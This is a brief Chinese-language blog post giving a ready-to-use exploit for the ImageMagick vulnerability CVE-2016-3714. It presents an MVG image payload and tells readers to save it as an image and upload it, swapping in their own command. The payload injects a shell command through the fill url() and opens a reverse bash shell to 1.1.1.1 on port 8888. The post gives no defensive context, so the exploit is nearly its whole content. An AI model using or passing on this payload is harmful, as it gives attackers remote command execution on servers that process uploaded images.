MENU

ImageMagick漏洞(cve-2016-3714)利用

May 5, 2016 • Security

如下内容保存为图片格式上传即可(命令部分自行替换)

push graphic-context  
viewbox 0 0 640 480  
fill 'url(http://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'  
pop graphic-context
Archives QR Code
QR Code for this page
Tipping QR Code